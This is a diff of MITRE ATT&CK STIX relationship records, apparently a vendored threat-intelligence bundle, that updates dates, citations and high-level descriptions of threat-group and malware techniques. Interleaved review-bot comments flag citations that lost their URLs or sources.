+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim\u2019s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--82d8c106-c216-4d3f-9028-5f0b975e6330",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.768Z",
+ "modified": "2020-05-29T01:24:37.227Z",
"created": "2019-01-30T17:33:40.964Z"
},
{
@@ -95512,12 +96663,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99"
}
],
- "source_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--67e6b603-a45d-4cbc-9b3e-546392934f7f",
@@ -95620,13 +96771,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) installed a backdoor macro in Microsoft Outlook for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--e1f7179b-37ac-4f47-8368-0f55814a6447",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.422Z",
+ "modified": "2020-06-29T21:45:35.957Z",
"created": "2019-01-31T01:07:58.720Z"
},
{
@@ -95650,9 +96801,9 @@
"id": "relationship--3d661b40-6ebf-470f-a675-142f86b6c649",
"source_ref": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9",
"relationship_type": "uses",
- "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
"type": "relationship",
- "modified": "2019-12-20T14:23:29.294Z",
+ "modified": "2020-06-24T00:32:56.513Z",
"created": "2019-01-31T02:11:53.932Z"
},
{
@@ -95814,18 +96965,23 @@
],
"external_references": [
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--cc78f0a1-7f4f-491e-a636-910f09d0c5a1",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
"type": "relationship",
- "modified": "2020-03-23T16:16:37.536Z",
+ "modified": "2020-05-18T19:04:38.153Z",
"created": "2019-01-30T17:33:40.928Z"
},
{
@@ -96276,16 +97432,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.698Z",
+ "modified": "2020-04-21T23:09:31.610Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -96458,28 +97614,33 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.401Z",
+ "modified": "2020-06-09T20:44:40.783Z",
"created": "2017-05-31T21:33:27.017Z"
},
{
"id": "relationship--fe4ed27a-6d45-4e6a-bbc0-7ebe15a38046",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.052Z",
+ "modified": "2020-06-16T20:51:13.951Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -96993,15 +98154,15 @@
{
"id": "relationship--3a8d8063-3f4d-420d-8c72-2b99077aa487",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
@@ -97017,13 +98178,18 @@
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
"url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
"source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.468Z",
+ "modified": "2020-04-29T15:17:18.866Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -97040,12 +98206,12 @@
"url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
}
],
- "source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--15489699-7ea0-473f-a4cd-5bc9e05e2104",
@@ -97121,14 +98287,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:25:11.709Z",
+ "modified": "2020-06-29T01:54:53.453Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -97145,12 +98311,12 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/"
}
],
- "source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b"
},
{
"id": "relationship--8272bde7-817f-4cb4-b073-67859002d310",
@@ -97386,12 +98552,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--b9f4c6ef-d0bd-4651-9445-4705e1fd85f2",
@@ -97428,12 +98594,12 @@
"url": "http://www.secpod.com/blog/winexe/"
}
],
- "source_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4"
},
{
"id": "relationship--98abda72-4760-4e8c-ab6c-5ed080868cfc",
@@ -97722,16 +98888,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.165Z",
+ "modified": "2020-05-14T15:14:33.561Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
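Review bot: The "DustySky" external reference in this hunk loses its `url` field and keeps only `source_name` and `description`, so anything that renders this relationship's citations (report generation, technique pages built from this bundle) now has no link for ClearSky's Operation DustySky report. If the link was dropped because the old URL is dead, a replacement URL should be supplied rather than the field removed; otherwise restore `"url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"` in the reference object. This looks like an upstream (MITRE CTI) change that was pulled in as-is, so it may be worth checking the upstream commit before patching the vendored copy locally.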
@@ -97963,16 +99128,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.069Z",
+ "modified": "2020-05-12T22:13:17.030Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -98113,12 +99278,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--dc4e54ed-ca71-4dd1-a61e-714222c0c76d",
@@ -98173,14 +99338,14 @@
"target_ref": "malware--5f9f7648-04ba-4a9f-bb4c-2a13e74572bd",
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"description": "(Citation: Palo Alto Gamaredon Feb 2017)",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.674Z",
+ "modified": "2020-06-22T17:54:16.008Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -98424,22 +99589,15 @@
{
"id": "relationship--808f140e-8b7b-4efa-8708-2f2308b2fc41",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.(Citation: SecureWorks Mia Ash July 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.477Z",
+ "modified": "2020-07-04T23:30:04.980Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
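Review bot: The Magic Hound relationship in this hunk now asserts a concrete behavior ("sent shortened URL links ... download Pupy") with no citation at all: the `(Citation: SecureWorks Mia Ash July 2017)` tag is stripped from `description` and the whole `external_references` array is deleted, while every other relationship in this diff carries at least one reference. An unsourced "uses" relationship is a data-quality regression for consumers that surface the citation with the technique. If the SecureWorks report was deliberately disassociated from this group upstream, the description should be rewritten or the relationship removed rather than left as an unsupported claim; otherwise restore the reference object and the citation suffix on the description line, `"description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.(Citation: SecureWorks Mia Ash July 2017)",`.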
@@ -98645,15 +99803,15 @@
{
"id": "relationship--ea7c1a9f-7d8e-4a06-8331-9901a33ee7d8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
@@ -98664,13 +99822,18 @@
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
"url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
"source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-12T00:31:45.478Z",
+ "modified": "2020-04-30T17:45:55.110Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -99286,16 +100449,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.770Z",
+ "modified": "2020-06-02T16:14:00.608Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -99414,12 +100577,12 @@
"url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
}
],
- "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f7ded6a1-043e-437a-8a0c-00ded73e5289",
@@ -99435,12 +100598,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--0d3e115b-ff08-4bff-8802-be3d21cec68f",
@@ -99491,18 +100654,23 @@
],
"external_references": [
{
- "source_name": "Talos Agent Tesla Oct 2018",
+ "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
+ "source_name": "Talos Agent Tesla Oct 2018"
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--60c1b489-f1fc-4568-aba0-54e932715abc",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
"type": "relationship",
- "modified": "2020-03-16T17:48:41.398Z",
+ "modified": "2020-05-20T13:38:07.318Z",
"created": "2019-01-29T18:44:05.077Z"
},
{
@@ -99580,13 +100748,13 @@
"source_name": "Unit 42 Tropic Trooper Nov 2016"
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) searches for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) can search for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
"id": "relationship--cdefab78-5d90-4e89-8664-5bbd30ab1517",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.218Z",
+ "modified": "2020-05-29T03:23:28.079Z",
"created": "2019-01-29T20:17:49.232Z"
},
{
@@ -99786,16 +100954,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.160Z",
+ "modified": "2020-05-14T15:14:33.565Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
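Review bot: Same regression as the other DustySky relationship in this file: the `url` field is removed from the "DustySky" external reference, leaving a citation that cannot be followed. Restore `"url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"` or supply a replacement link if the original is no longer reachable. Since this bundle appears to be a vendored copy of the upstream STIX data, the fix probably belongs upstream, but the vendored file should not be merged with citations that silently lost their links.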
@@ -100179,9 +101346,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -100193,7 +101360,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.767Z",
+ "modified": "2020-06-02T16:14:00.488Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -100550,16 +101717,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
